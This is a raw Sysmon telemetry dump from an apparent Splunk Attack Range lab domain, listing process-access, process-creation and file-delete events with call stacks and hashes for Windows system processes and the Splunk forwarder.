08:04:24.229{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.227{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.227{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.211{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.208{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.208{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.190{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe 
-EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001053356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.180{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:24.180{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.050{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1646E61C10B4300CE5B87E5100D6E7F,SHA256=FEC05D933E60E92E8C29AB3C09C058EFEA02530DD979171897BB46288FD291FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5446FEC0CEBF9DFEFAC4AE942FAF4C1C,SHA256=654C8F07FB90C11B80630DF7B07D022C804DA570E8A0FC3C38FA3A2272A4ED8E,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000809761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.838{0C1E0330-F789-60EB-C979-00000000D001}23721840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:25.682{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.682{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.667{0C1E0330-F789-60EB-C979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 